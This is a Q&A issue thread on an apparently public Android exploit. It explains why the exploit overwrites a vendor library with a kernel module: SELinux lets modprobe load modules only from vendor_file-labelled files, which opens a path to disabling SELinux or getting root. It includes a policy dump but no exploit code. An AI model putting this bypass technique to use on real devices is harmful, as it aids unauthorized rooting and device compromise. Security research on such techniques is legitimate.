Questions about TECHNICAL-DETAILS

Question

Questions about TECHNICAL-DETAILS

Closed this issue 2 years ago · 5 comments

Hi, I have some doubts, why do we need to overwrite libstagefright_soft_mp3dec.so with the content of mymod.ko? Since we have tampered with /vendor/bin/modprobe, why not just execute finit_module(mymod.ko) and call the interface that closes SELINUX? What is the purpose of calling open(*.so) first?

Answer 1 · 2022-04-14T14:25:33.000Z

The dump of selinux policy:

$ sesearch -A policy-dump|grep module_load
allow init-insmod-sh vendor_kernel_modules:system module_load;
allow ueventd vendor_file:system module_load;
allow vendor_modprobe vendor_file:system module_load;

By selinux enforcement, vendor_modprobe can load modules only from vendor_file files. It means finit_module must be called on fd which points to a vendor_file file.
Otherwise finit_module fails with EACCES.

Furthermore init_module with memory buffer is also prohibited by selinux.

It is only way I found to load module.

Answer 2 · 2022-04-15T02:48:40.000Z

The dump of selinux policy:
$ sesearch -A policy-dump|grep module_load
allow init-insmod-sh vendor_kernel_modules:system module_load;
allow ueventd vendor_file:system module_load;
allow vendor_modprobe vendor_file:system module_load;
By selinux enforcement, vendor_modprobe can load modules only from vendor_file files. It means finit_module must be called on fd which points to a vendor_file file. Otherwise finit_module fails with EACCES.

Furthermore init_module with memory buffer is also prohibited by selinux.

It is only way I found to load module.

Thank you very much for your answer. So the purpose of open lib*.so is to bypass selinux's restriction on disabling memory buffers when loading_module. In other words, open lib*.so is to load memory buffers into modprobe process, and these memory buffers will be used in the payload of closing selinux or get root?

I am still a little unclear about where the buffers brought by lib*.so are used in the code.Can you point out the lines of code that use these buffers? Thank you very much.

Answer 3 · 2022-04-15T04:20:58.000Z

It is loaded inside kernel. Kernel loads file content into kernel memory from fd, then executes it.

https://github.com/torvalds/linux/blob/028192fea1de083f4f12bfb1eb7c4d7beb5c8ecd/kernel/module.c#L4207

Answer 4 · 2022-04-15T06:43:41.000Z

It is loaded inside kernel. Kernel loads file content into kernel memory from fd, then executes it.

https://github.com/torvalds/linux/blob/028192fea1de083f4f12bfb1eb7c4d7beb5c8ecd/kernel/module.c#L4207

thank you very much. If my understanding is correct, assuming that mymod.ko has the role of vendor_file, then lib*.so is not needed, just open(mymod.ko) directly, and then call finit_module(fd) to complete the exploit.

Answer 5 · 2022-04-15T12:35:39.000Z

Yes.

But in reality, you can't change context of any file because of selinux.